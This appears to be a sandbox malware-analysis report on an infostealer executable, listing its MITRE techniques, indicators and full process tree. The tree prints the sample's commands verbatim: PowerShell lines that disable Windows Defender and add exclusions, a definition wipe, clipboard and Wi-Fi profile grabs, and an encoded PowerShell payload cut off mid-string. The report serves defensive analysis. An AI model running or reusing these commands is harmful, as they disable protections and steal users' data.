ee26f6730dc7e98e754126400f120bc654037b9dd7646757d3d20eb8c7500833

Analysis

max time kernel
146s
max time network
152s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
25-11-2024 17:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

privexternal.exe
Size

7.5MB
MD5

df176de82c037b3405acfd0a85d0889b
SHA1

417ed55c786d7941325d6851f57d5b46883d674e
SHA256

ee26f6730dc7e98e754126400f120bc654037b9dd7646757d3d20eb8c7500833
SHA512

bdc929043bcec8f7537c7968a642b576c24d652e7fe8b221f4f4bf7d6e4e32f8dd092519f0e93711c28b4c5c3ede90ffaa7a02312bc8ae2aa6cd7e2a9a0aeeaa
SSDEEP

196608:bxunqZcewfI9jUC2XMvH8zPjweaBpZ0cX2ooccXK7oSC:YLIH2XgHq+jq93YoP

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	Process
2416	powershell.exe
3316	powershell.exe
3372	powershell.exe
1880	powershell.exe
4560	powershell.exe

Drops file in Drivers directory 3 IoCs

Processes:

privexternal.exeattrib.exeattrib.exe

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	privexternal.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

Processes:

cmd.exepowershell.exe

pid	Process
668	cmd.exe
4980	powershell.exe

Executes dropped EXE 1 IoCs

Processes:

rar.exe

pid	Process
1196	rar.exe

Loads dropped DLL 17 IoCs

Processes:

privexternal.exe

pid	Process
1252	privexternal.exe
1252	privexternal.exe
1252	privexternal.exe
1252	privexternal.exe
1252	privexternal.exe
1252	privexternal.exe
1252	privexternal.exe
1252	privexternal.exe
1252	privexternal.exe
1252	privexternal.exe
1252	privexternal.exe
1252	privexternal.exe
1252	privexternal.exe
1252	privexternal.exe
1252	privexternal.exe
1252	privexternal.exe
1252	privexternal.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

Processes:

flow	ioc
1	discord.com
6	discord.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow	ioc
1	ip-api.com
4	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 5 IoCs

discovery

Process Discovery

T1057

Processes:

tasklist.exetasklist.exetasklist.exetasklist.exetasklist.exe

pid	Process
4896	tasklist.exe
1536	tasklist.exe
1636	tasklist.exe
4608	tasklist.exe
1800	tasklist.exe

UPX packed file 56 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/files/0x001900000002aadb-21.dat	upx
behavioral1/memory/1252-25-0x00007FFB449D0000-0x00007FFB45092000-memory.dmp	upx
behavioral1/files/0x001a00000002aac7-27.dat	upx
behavioral1/memory/1252-30-0x00007FFB59ED0000-0x00007FFB59EF5000-memory.dmp	upx
behavioral1/files/0x001900000002aad7-31.dat	upx
behavioral1/files/0x001c00000002aae2-39.dat	upx
behavioral1/memory/1252-48-0x00007FFB5FE80000-0x00007FFB5FE8F000-memory.dmp	upx
behavioral1/files/0x001c00000002aad0-46.dat	upx
behavioral1/files/0x001900000002aacf-45.dat	upx
behavioral1/files/0x001900000002aacc-44.dat	upx
behavioral1/files/0x001900000002aacb-43.dat	upx
behavioral1/files/0x001900000002aac9-42.dat	upx
behavioral1/files/0x001900000002aac8-41.dat	upx
behavioral1/files/0x001b00000002aac4-40.dat	upx
behavioral1/files/0x001900000002aad1-47.dat	upx
behavioral1/files/0x001900000002aae1-38.dat	upx
behavioral1/files/0x001900000002aade-37.dat	upx
behavioral1/files/0x001900000002aad8-34.dat	upx
behavioral1/files/0x001c00000002aad6-33.dat	upx
behavioral1/memory/1252-54-0x00007FFB59D90000-0x00007FFB59DBC000-memory.dmp	upx
behavioral1/memory/1252-56-0x00007FFB5B880000-0x00007FFB5B899000-memory.dmp	upx
behavioral1/memory/1252-58-0x00007FFB59D60000-0x00007FFB59D84000-memory.dmp	upx
behavioral1/memory/1252-60-0x00007FFB442B0000-0x00007FFB4442F000-memory.dmp	upx
behavioral1/memory/1252-62-0x00007FFB5B700000-0x00007FFB5B719000-memory.dmp	upx
behavioral1/memory/1252-64-0x00007FFB5F9A0000-0x00007FFB5F9AD000-memory.dmp	upx
behavioral1/memory/1252-66-0x00007FFB59CE0000-0x00007FFB59D13000-memory.dmp	upx
behavioral1/memory/1252-71-0x00007FFB56070000-0x00007FFB5613E000-memory.dmp	upx
behavioral1/memory/1252-70-0x00007FFB449D0000-0x00007FFB45092000-memory.dmp	upx
behavioral1/memory/1252-74-0x00007FFB59ED0000-0x00007FFB59EF5000-memory.dmp	upx
behavioral1/memory/1252-73-0x00007FFB43D70000-0x00007FFB442A3000-memory.dmp	upx
behavioral1/memory/1252-78-0x00007FFB5A7D0000-0x00007FFB5A7DD000-memory.dmp	upx
behavioral1/memory/1252-80-0x00007FFB55DD0000-0x00007FFB55EEA000-memory.dmp	upx
behavioral1/memory/1252-76-0x00007FFB59C00000-0x00007FFB59C14000-memory.dmp	upx
behavioral1/memory/1252-101-0x00007FFB59D60000-0x00007FFB59D84000-memory.dmp	upx
behavioral1/memory/1252-117-0x00007FFB442B0000-0x00007FFB4442F000-memory.dmp	upx
behavioral1/memory/1252-277-0x00007FFB59CE0000-0x00007FFB59D13000-memory.dmp	upx
behavioral1/memory/1252-281-0x00007FFB56070000-0x00007FFB5613E000-memory.dmp	upx
behavioral1/memory/1252-295-0x00007FFB43D70000-0x00007FFB442A3000-memory.dmp	upx
behavioral1/memory/1252-315-0x00007FFB449D0000-0x00007FFB45092000-memory.dmp	upx
behavioral1/memory/1252-321-0x00007FFB442B0000-0x00007FFB4442F000-memory.dmp	upx
behavioral1/memory/1252-316-0x00007FFB59ED0000-0x00007FFB59EF5000-memory.dmp	upx
behavioral1/memory/1252-332-0x00007FFB5FE80000-0x00007FFB5FE8F000-memory.dmp	upx
behavioral1/memory/1252-344-0x00007FFB55DD0000-0x00007FFB55EEA000-memory.dmp	upx
behavioral1/memory/1252-352-0x00007FFB59CE0000-0x00007FFB59D13000-memory.dmp	upx
behavioral1/memory/1252-351-0x00007FFB5F9A0000-0x00007FFB5F9AD000-memory.dmp	upx
behavioral1/memory/1252-350-0x00007FFB5B700000-0x00007FFB5B719000-memory.dmp	upx
behavioral1/memory/1252-349-0x00007FFB442B0000-0x00007FFB4442F000-memory.dmp	upx
behavioral1/memory/1252-348-0x00007FFB59D60000-0x00007FFB59D84000-memory.dmp	upx
behavioral1/memory/1252-347-0x00007FFB5B880000-0x00007FFB5B899000-memory.dmp	upx
behavioral1/memory/1252-346-0x00007FFB59D90000-0x00007FFB59DBC000-memory.dmp	upx
behavioral1/memory/1252-345-0x00007FFB43D70000-0x00007FFB442A3000-memory.dmp	upx
behavioral1/memory/1252-343-0x00007FFB5A7D0000-0x00007FFB5A7DD000-memory.dmp	upx
behavioral1/memory/1252-342-0x00007FFB59C00000-0x00007FFB59C14000-memory.dmp	upx
behavioral1/memory/1252-340-0x00007FFB56070000-0x00007FFB5613E000-memory.dmp	upx
behavioral1/memory/1252-331-0x00007FFB59ED0000-0x00007FFB59EF5000-memory.dmp	upx
behavioral1/memory/1252-330-0x00007FFB449D0000-0x00007FFB45092000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

Processes:

netsh.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

Processes:

cmd.exenetsh.exe

pid	Process
3260	cmd.exe
2676	netsh.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

Processes:

WMIC.exeWMIC.exeWMIC.exe

pid	Process
3548	WMIC.exe
4848	WMIC.exe
1880	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

Processes:

systeminfo.exe

pid	Process
756	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 20 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	Process
4560	powershell.exe
4560	powershell.exe
2416	powershell.exe
2416	powershell.exe
3316	powershell.exe
3316	powershell.exe
4980	powershell.exe
4980	powershell.exe
4980	powershell.exe
980	powershell.exe
980	powershell.exe
980	powershell.exe
3372	powershell.exe
3372	powershell.exe
4416	powershell.exe
4416	powershell.exe
1880	powershell.exe
1880	powershell.exe
4756	powershell.exe
4756	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

tasklist.exeWMIC.exepowershell.exepowershell.exeWMIC.exe

description	pid	Process
Token: SeDebugPrivilege	4896	tasklist.exe
Token: SeIncreaseQuotaPrivilege	1720	WMIC.exe
Token: SeSecurityPrivilege	1720	WMIC.exe
Token: SeTakeOwnershipPrivilege	1720	WMIC.exe
Token: SeLoadDriverPrivilege	1720	WMIC.exe
Token: SeSystemProfilePrivilege	1720	WMIC.exe
Token: SeSystemtimePrivilege	1720	WMIC.exe
Token: SeProfSingleProcessPrivilege	1720	WMIC.exe
Token: SeIncBasePriorityPrivilege	1720	WMIC.exe
Token: SeCreatePagefilePrivilege	1720	WMIC.exe
Token: SeBackupPrivilege	1720	WMIC.exe
Token: SeRestorePrivilege	1720	WMIC.exe
Token: SeShutdownPrivilege	1720	WMIC.exe
Token: SeDebugPrivilege	1720	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1720	WMIC.exe
Token: SeRemoteShutdownPrivilege	1720	WMIC.exe
Token: SeUndockPrivilege	1720	WMIC.exe
Token: SeManageVolumePrivilege	1720	WMIC.exe
Token: 33	1720	WMIC.exe
Token: 34	1720	WMIC.exe
Token: 35	1720	WMIC.exe
Token: 36	1720	WMIC.exe
Token: SeDebugPrivilege	4560	powershell.exe
Token: SeDebugPrivilege	2416	powershell.exe
Token: SeIncreaseQuotaPrivilege	1720	WMIC.exe
Token: SeSecurityPrivilege	1720	WMIC.exe
Token: SeTakeOwnershipPrivilege	1720	WMIC.exe
Token: SeLoadDriverPrivilege	1720	WMIC.exe
Token: SeSystemProfilePrivilege	1720	WMIC.exe
Token: SeSystemtimePrivilege	1720	WMIC.exe
Token: SeProfSingleProcessPrivilege	1720	WMIC.exe
Token: SeIncBasePriorityPrivilege	1720	WMIC.exe
Token: SeCreatePagefilePrivilege	1720	WMIC.exe
Token: SeBackupPrivilege	1720	WMIC.exe
Token: SeRestorePrivilege	1720	WMIC.exe
Token: SeShutdownPrivilege	1720	WMIC.exe
Token: SeDebugPrivilege	1720	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1720	WMIC.exe
Token: SeRemoteShutdownPrivilege	1720	WMIC.exe
Token: SeUndockPrivilege	1720	WMIC.exe
Token: SeManageVolumePrivilege	1720	WMIC.exe
Token: 33	1720	WMIC.exe
Token: 34	1720	WMIC.exe
Token: 35	1720	WMIC.exe
Token: 36	1720	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4848	WMIC.exe
Token: SeSecurityPrivilege	4848	WMIC.exe
Token: SeTakeOwnershipPrivilege	4848	WMIC.exe
Token: SeLoadDriverPrivilege	4848	WMIC.exe
Token: SeSystemProfilePrivilege	4848	WMIC.exe
Token: SeSystemtimePrivilege	4848	WMIC.exe
Token: SeProfSingleProcessPrivilege	4848	WMIC.exe
Token: SeIncBasePriorityPrivilege	4848	WMIC.exe
Token: SeCreatePagefilePrivilege	4848	WMIC.exe
Token: SeBackupPrivilege	4848	WMIC.exe
Token: SeRestorePrivilege	4848	WMIC.exe
Token: SeShutdownPrivilege	4848	WMIC.exe
Token: SeDebugPrivilege	4848	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4848	WMIC.exe
Token: SeRemoteShutdownPrivilege	4848	WMIC.exe
Token: SeUndockPrivilege	4848	WMIC.exe
Token: SeManageVolumePrivilege	4848	WMIC.exe
Token: 33	4848	WMIC.exe
Token: 34	4848	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

privexternal.exeprivexternal.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	Process	procid_target
PID 2060 wrote to memory of 1252	2060	privexternal.exe	79
PID 2060 wrote to memory of 1252	2060	privexternal.exe	79
PID 1252 wrote to memory of 4764	1252	privexternal.exe	81
PID 1252 wrote to memory of 4764	1252	privexternal.exe	81
PID 1252 wrote to memory of 3792	1252	privexternal.exe	82
PID 1252 wrote to memory of 3792	1252	privexternal.exe	82
PID 1252 wrote to memory of 2488	1252	privexternal.exe	83
PID 1252 wrote to memory of 2488	1252	privexternal.exe	83
PID 1252 wrote to memory of 2172	1252	privexternal.exe	87
PID 1252 wrote to memory of 2172	1252	privexternal.exe	87
PID 1252 wrote to memory of 4516	1252	privexternal.exe	89
PID 1252 wrote to memory of 4516	1252	privexternal.exe	89
PID 2172 wrote to memory of 4896	2172	cmd.exe	91
PID 2172 wrote to memory of 4896	2172	cmd.exe	91
PID 3792 wrote to memory of 4560	3792	cmd.exe	92
PID 3792 wrote to memory of 4560	3792	cmd.exe	92
PID 4516 wrote to memory of 1720	4516	cmd.exe	93
PID 4516 wrote to memory of 1720	4516	cmd.exe	93
PID 4764 wrote to memory of 2416	4764	cmd.exe	94
PID 4764 wrote to memory of 2416	4764	cmd.exe	94
PID 2488 wrote to memory of 804	2488	cmd.exe	95
PID 2488 wrote to memory of 804	2488	cmd.exe	95
PID 1252 wrote to memory of 1480	1252	privexternal.exe	97
PID 1252 wrote to memory of 1480	1252	privexternal.exe	97
PID 1480 wrote to memory of 2016	1480	cmd.exe	99
PID 1480 wrote to memory of 2016	1480	cmd.exe	99
PID 1252 wrote to memory of 1792	1252	privexternal.exe	100
PID 1252 wrote to memory of 1792	1252	privexternal.exe	100
PID 1792 wrote to memory of 1528	1792	cmd.exe	102
PID 1792 wrote to memory of 1528	1792	cmd.exe	102
PID 1252 wrote to memory of 3996	1252	privexternal.exe	103
PID 1252 wrote to memory of 3996	1252	privexternal.exe	103
PID 3996 wrote to memory of 4848	3996	cmd.exe	105
PID 3996 wrote to memory of 4848	3996	cmd.exe	105
PID 1252 wrote to memory of 872	1252	privexternal.exe	167
PID 1252 wrote to memory of 872	1252	privexternal.exe	167
PID 872 wrote to memory of 1880	872	cmd.exe	108
PID 872 wrote to memory of 1880	872	cmd.exe	108
PID 1252 wrote to memory of 3236	1252	privexternal.exe	109
PID 1252 wrote to memory of 3236	1252	privexternal.exe	109
PID 3236 wrote to memory of 3316	3236	cmd.exe	111
PID 3236 wrote to memory of 3316	3236	cmd.exe	111
PID 1252 wrote to memory of 2164	1252	privexternal.exe	112
PID 1252 wrote to memory of 2164	1252	privexternal.exe	112
PID 1252 wrote to memory of 2284	1252	privexternal.exe	113
PID 1252 wrote to memory of 2284	1252	privexternal.exe	113
PID 2164 wrote to memory of 1536	2164	cmd.exe	116
PID 2164 wrote to memory of 1536	2164	cmd.exe	116
PID 2284 wrote to memory of 1636	2284	cmd.exe	117
PID 2284 wrote to memory of 1636	2284	cmd.exe	117
PID 1252 wrote to memory of 4652	1252	privexternal.exe	118
PID 1252 wrote to memory of 4652	1252	privexternal.exe	118
PID 1252 wrote to memory of 668	1252	privexternal.exe	120
PID 1252 wrote to memory of 668	1252	privexternal.exe	120
PID 4652 wrote to memory of 2764	4652	cmd.exe	122
PID 4652 wrote to memory of 2764	4652	cmd.exe	122
PID 1252 wrote to memory of 312	1252	privexternal.exe	123
PID 1252 wrote to memory of 312	1252	privexternal.exe	123
PID 1252 wrote to memory of 3512	1252	privexternal.exe	179
PID 1252 wrote to memory of 3512	1252	privexternal.exe	179
PID 668 wrote to memory of 4980	668	cmd.exe	126
PID 668 wrote to memory of 4980	668	cmd.exe	126
PID 1252 wrote to memory of 3260	1252	privexternal.exe	128
PID 1252 wrote to memory of 3260	1252	privexternal.exe	128

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

Processes:

attrib.exeattrib.exe

pid	Process
828	attrib.exe
3956	attrib.exe

C:\Users\Admin\AppData\Local\Temp\privexternal.exe
"C:\Users\Admin\AppData\Local\Temp\privexternal.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2060
- C:\Users\Admin\AppData\Local\Temp\privexternal.exe
  "C:\Users\Admin\AppData\Local\Temp\privexternal.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1252
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\privexternal.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4764
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\privexternal.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2416
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3792
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4560
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('dm n4eoo on discord to gain whitelist access!', 0, 'viper.gg', 32+16);close()""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2488
  - - C:\Windows\system32\mshta.exe
      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('dm n4eoo on discord to gain whitelist access!', 0, 'viper.gg', 32+16);close()"
      4⤵
      PID:804
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2172
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4896
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4516
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1720
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1480
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:2016
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1792
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:1528
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3996
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious use of AdjustPrivilegeToken
      PID:4848
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:872
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:1880
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‎ .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3236
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‎ .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:3316
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2164
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:1536
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2284
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:1636
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4652
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:2764
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:668
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      PID:4980
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:312
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4608
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3512
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1412
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:3260
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:2676
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:4864
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:756
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:1432
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:1900
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGU